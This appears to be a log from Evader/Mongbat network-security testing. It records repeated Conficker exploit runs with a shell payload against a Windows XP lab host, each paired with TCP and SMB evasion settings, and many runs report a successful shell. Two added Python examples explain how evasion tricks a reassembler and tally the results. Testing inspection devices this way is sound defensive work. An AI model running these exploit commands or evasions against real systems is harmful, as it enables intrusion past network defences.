Info: NetBIOS connection 10.62.90.116:30391 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
10001 runs averaging 1.87 runs / second ; progress: 5359/43200.....2015-06-08 00:48:50 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39260 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=aglHj0x7Asw --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"25%","chksum|nullchksum|nullflag|outofwindow|shorthdr","unmodified" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","5","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed aglHj0x7Asx
The following evasions are applied from stage smb_opentree to smb_openpipe:

The following evasions are applied from stage smb_opentree to msrpc_req:
- 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload

Info: NetBIOS connection 10.62.90.111:39260 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.2015-06-08 00:48:51 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54804 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hoHhi2FG8pI --evasion=[smb_connect,smb_openpipe]tcp_chaff,"3","chksum","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","7","shuffle" --verifydelay=1000 --payload=shell
Info: Using random seed hoHhi2FG8pK
The following evasions are applied from stage smb_connect to smb_openpipe:
- With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
* Invalid TCP checksum.
* Duplicate packet has 0x00 bytes as payload
The following evasions are applied from stage smb_opentree to msrpc_req:
- Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has shuffled original payload

Info: NetBIOS connection 10.62.90.116:54804 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: CommandShell::SendCommand() - Failed to send string
Info: Command shell connection reset.
Info: Shell closed
0: Success.
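The three TCP-level evasions the runs above describe (tcp_paws duplicates with an old timestamp, tcp_chaff segments with a bad checksum, NULL flags, short header or out-of-window sequence number, and the 4-byte segment overlap where the later packet carries the correct bytes) all exploit the same weakness: an inline inspector that does not drop exactly what the victim's TCP stack drops, and does not resolve overlaps the same way, reassembles a different byte stream than the host and inspects the wrong data. The following is an added example, not code from the Evader log or the tool; the segment contents, timestamps and arrival order are constructed, and it assumes the victim stack performs the PAWS check and favours the later segment on overlap (which is what the "later packet containing the correct payload" runs succeeding implies, not something the log states).

```python
# Added example: toy TCP stream reassembler showing why tcp_paws, tcp_chaff
# and the 4-byte overlap evade an inspector whose reassembly differs from
# the victim's. All segment data below is constructed for this example.
from dataclasses import dataclass


@dataclass
class Seg:
    seq: int                # relative sequence number of the first payload byte
    data: bytes
    tsval: int              # TCP timestamp option value (TSval)
    flags: str = "PA"       # control flags; "" models the NULL-flag chaff
    cksum_ok: bool = True   # False models the bad-checksum chaff
    hdr_len: int = 20       # data offset in bytes; < 20 models the short-header chaff


WINDOW = 65535          # receiver window assumed for the in-window check
HANDSHAKE_TSVAL = 100   # TSval assumed to have been learned from the SYN


def reassemble(segs, *, validate, paws, policy):
    """Rebuild the byte stream from segments given in arrival order.

    validate: drop what a real stack never queues: bad checksum, NULL flags,
              header shorter than 20 bytes, or no byte inside the window
    paws:     drop segments whose TSval is older than TS.Recent (RFC 7323
              PAWS; timestamp wraparound is ignored in this toy)
    policy:   on overlap, 'first' keeps bytes already queued, 'last' lets the
              later segment overwrite them
    Returns the contiguous bytes from offset 0 up to the first hole.
    """
    stream = {}
    rcv_nxt = 0
    ts_recent = HANDSHAKE_TSVAL
    for s in segs:
        if validate:
            if s.hdr_len < 20 or not s.cksum_ok or s.flags == "":
                continue
            if not (s.seq < rcv_nxt + WINDOW and s.seq + len(s.data) > rcv_nxt):
                continue
        if paws and s.tsval < ts_recent:
            continue
        for i, b in enumerate(s.data):
            off = s.seq + i
            if policy == "last" or off not in stream:
                stream[off] = b
        if s.seq <= rcv_nxt:            # RFC 7323: update TS.Recent for in-order data
            ts_recent = max(ts_recent, s.tsval)
        while rcv_nxt in stream:        # advance over contiguous bytes
            rcv_nxt += 1
    return bytes(stream[i] for i in range(rcv_nxt))


# Constructed stand-in for the SMB WriteAndX / DCERPC data the exploit must deliver.
PART_A = b"SMB WriteAndX "
PART_B = b"\\PIPE\\browser "
PART_C = b"DCERPC bind"
TRUE_STREAM = PART_A + PART_B + PART_C

ARRIVALS = [
    # tcp_paws: duplicate of the first segment with random-alpha payload and a
    # TSval 7 behind the real one; assumed here to be sent ahead of the real copy
    Seg(0, b"kq3Zp9Lw2Rt7Mv", tsval=HANDSHAKE_TSVAL - 7),
    Seg(0, PART_A, tsval=100),
    # tcp_chaff with an invalid checksum and 0x00 payload
    Seg(14, b"\x00" * 14, tsval=101, cksum_ok=False),
    # tcp_chaff with NULL flags, a short header and an out-of-window sequence number
    Seg(14 + WINDOW + 1, b"CHAFF", tsval=101, flags="", hdr_len=16),
    # overlap: the earlier segment runs 4 random bytes into the next one's range ...
    Seg(14, PART_B + b"Gh4Q", tsval=101),
    # ... and the later segment carries the correct bytes for that range
    Seg(28, PART_C, tsval=102),
]


def host_view():
    """Stack that validates, applies PAWS and favours later data (assumed victim behaviour)."""
    return reassemble(ARRIVALS, validate=True, paws=True, policy="last")


def naive_inspector_view():
    """Inspector that queues everything it sees and keeps the first copy of a byte."""
    return reassemble(ARRIVALS, validate=False, paws=False, policy="first")


def half_hardened_view():
    """Inspector that drops chaff but ignores PAWS and keeps the first copy."""
    return reassemble(ARRIVALS, validate=True, paws=False, policy="first")


if __name__ == "__main__":
    print("host   :", host_view())
    print("naive  :", naive_inspector_view())
    print("no-PAWS:", half_hardened_view())
```

Only the host-like configuration yields the real payload; the naive inspector sees random alpha bytes, zeros from the chaff and the 4 garbage overlap bytes, and even the inspector that drops chaff still loses on the PAWS duplicate and the overlap policy. The practical check for a device under test is therefore not "does it detect Conficker" but "does its reassembly match the target stack for every one of these cases", which is what the randomized combinations in this log probe.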
........
10017 runs averaging 1.87 runs / second ; progress: 5364/43200.............
10030 runs averaging 1.87 runs / second ; progress: 5369/43200..........
10040 runs averaging 1.87 runs / second ; progress: 5374/43200.....
10045 runs averaging 1.87 runs / second ; progress: 5379/43200....
10049 runs averaging 1.87 runs / second ; progress: 5384/43200.....
10054 runs averaging 1.87 runs / second ; progress: 5389/43200..........Pid 18512 timed out - killed
2015-06-08 00:49:22 INFO
Timed out (10.62.90.113):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29691 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UepWOS12Ry4 --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","unmodified" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
Info: Using random seed UepWOS12Ry5
The following evasions are applied from stage smb_openpipe to msrpc_bind:
- 75% probability to add a random urgent data byte to a TCP segment.
The following evasions are applied from stage msrpc_bind to end:
- Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
The duplicate packet has identical payload

Info: NetBIOS connection 10.62.90.113:29691 -> 10.35.1.207:445
Terminated
.....
10070 runs averaging 1.87 runs / second ; progress: 5394/43200..............2015-06-08 00:49:27 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23791 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=vvbQ2wZqrA4 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"7","4","7","random" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","7","random_msrpcreq" --verifydelay=1000 --payload=shell
Info: Using random seed vvbQ2wZqrA6
The following evasions are applied from stage smb_opentree to msrpc_bind:
- Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 7 random bytes.
The following evasions are applied from stage smb_opentree to msrpc_req:
- Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.

Info: NetBIOS connection 10.62.90.116:23791 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
...
10088 runs averaging 1.87 runs / second ; progress: 5399/43200.................
10105 runs averaging 1.87 runs / second ; progress: 5404/43200...........
10116 runs averaging 1.87 runs / second ; progress: 5409/43200........
10124 runs averaging 1.87 runs / second ; progress: 5414/43200..2015-06-08 00:49:47 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37811 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=rAdEwDS3pbY --evasion=[msrpc_bind,end]smb_decoytrees,"4","2","8","random_msrpcreq" --evasion=[netbios_connect,msrpc_req]tcp_chaff,"25%","nullflag|outofwindow|shorthdr","random_alpha" --verifydelay=1000 --payload=shell
Info: Using random seed rAdEwDS3pba
The following evasions are applied from stage netbios_connect to msrpc_req:
- 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
* NULL TCP control flags.
* An out-of-window sequence number.
* TCP header shorter than 20 bytes
* Duplicate packet has random alpha bytes as payload
The following evasions are applied from stage msrpc_bind to end:
- Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.

Info: NetBIOS connection 10.62.90.111:37811 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.......
44283 runs averaging 1.73 runs / second ; progress: 25593/432002015-06-08 06:26:03 INFO
Success. (10.62.90.114):
/root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33396 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=SlCGLlc3zX8 --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"3","random_alphanum" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"25%","7","random" --verifydelay=1000 --payload=shell
Info: Using random seed SlCGLlc3zX9
The following evasions are applied from stage smb_openpipe to msrpc_req:
- 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
The following evasions are applied from stage msrpc_bind to msrpc_req:
- 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload

Info: NetBIOS connection 10.62.90.114:33396 -> 10.35.1.207:445
Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
Info: Sending MSRPC request with exploit
Info: Shell found, attack succeeded
Info: Shell closed
0: Success.
.....
550874 runs averaging 12.76 runs / second ; progress: 43175/43200.............................................................................................................................................................
551031 runs averaging 12.76 runs / second ; progress: 43181/43200...................................................................................................................................
551162 runs averaging 12.76 runs / second ; progress: 43187/43200...................................................................................................................................
551293 runs averaging 12.76 runs / second ; progress: 43194/43200..................................................................................................................................
2015-06-08 11:19:31 INFO Done.
Printing test result
2015-06-08 11:19:32 INFO Mongbat test report

Using /root/evader/evader version 2013.2.586 ( x86, o, evc4 )

Started : 2015-06-07 23:19:29 +0300
Finished: 2015-06-08 11:19:31 +0300
Log
close
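The report above ends before its per-evasion breakdown, yet that breakdown is what matters when reading a run like this: over half a million randomized combinations, only a few hundred reached a shell, and which evasion families those were tells you what the device's reassembly gets wrong. The following is an added example, not part of the log or the Evader tool: a small parser for this log format that pairs each "Success." or "Timed out" line with the evader command that follows it, pulls the `--evasion=[stages]name,"params"` entries out of it, and tallies outcomes per evasion name. The sample input is a constructed excerpt in the same shape as the lines above (the `--uid` value is shortened).

```python
# Added example: tally Evader run outcomes per evasion technique from a
# mongbat log. SAMPLE_LOG is a constructed excerpt in the log's format.
import re
from collections import defaultdict

SAMPLE_LOG = """\
10001 runs averaging 1.87 runs / second ; progress: 5359/43200.....2015-06-08 00:48:50 INFO
Success. (10.62.90.111):
/root/evader/evader --uid=x --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --attack=conficker --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"25%","chksum|nullflag","unmodified" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","5","random_alpha" --payload=shell
Info: Shell found, attack succeeded
0: Success.
10054 runs averaging 1.87 runs / second ; progress: 5389/43200..........Pid 18512 timed out - killed
2015-06-08 00:49:22 INFO
Timed out (10.62.90.113):
/root/evader/evader --uid=x --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --attack=conficker --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","unmodified" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --payload=shell
Info: NetBIOS connection 10.62.90.113:29691 -> 10.35.1.207:445
Terminated
2015-06-08 00:49:27 INFO
Success. (10.62.90.116):
/root/evader/evader --uid=x --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --attack=conficker --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"7","4","7","random" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","7","shuffle" --payload=shell
0: Success.
"""

# "Success. (10.62.90.111):" or "Timed out (10.62.90.113):" on a line of its own
OUTCOME_RE = re.compile(r"^(Success\.|Timed out) \((\d{1,3}(?:\.\d{1,3}){3})\):\s*$")
# --evasion=[stage_from,stage_to]name,"p1","p2",...
EVASION_RE = re.compile(r'--evasion=\[([^\]]+)\](\w+)((?:,"[^"]*")*)')


def parse_runs(text):
    """Return one dict per run: outcome, attacking source IP and its evasion list."""
    runs = []
    pending = None
    for line in text.splitlines():
        m = OUTCOME_RE.match(line.strip())
        if m:
            pending = {"outcome": m.group(1).rstrip("."), "src": m.group(2)}
            continue
        if pending and "/root/evader/evader" in line:
            pending["evasions"] = [
                {
                    "stages": tuple(stages.split(",")),
                    "name": name,
                    "params": re.findall(r'"([^"]*)"', params),
                }
                for stages, name, params in EVASION_RE.findall(line)
            ]
            runs.append(pending)
            pending = None
    return runs


def summarize(runs):
    """Per evasion name, how many runs using it ended in each outcome."""
    table = defaultdict(lambda: defaultdict(int))
    for run in runs:
        for ev in run["evasions"]:
            table[ev["name"]][run["outcome"]] += 1
    return {name: dict(counts) for name, counts in table.items()}


def combos(runs, outcome="Success"):
    """Sorted, de-duplicated evasion-name combinations that produced `outcome`."""
    return sorted(
        {tuple(sorted(ev["name"] for ev in r["evasions"])) for r in runs if r["outcome"] == outcome}
    )


if __name__ == "__main__":
    parsed = parse_runs(SAMPLE_LOG)
    for name, counts in sorted(summarize(parsed).items()):
        print(f"{name:18s} {counts}")
    print("breaching combinations:", combos(parsed))
```

Run it over the full log (`parse_runs(open("evader.log").read())`) rather than the excerpt to get the real breakdown. Two reading caveats: a "Timed out" run is inconclusive, not a block, so keep it as its own outcome instead of folding it into "blocked"; and because each run carries two or three evasions, `summarize` counts a run once per evasion it used, so the `combos` output is the better guide to which combination actually slipped through.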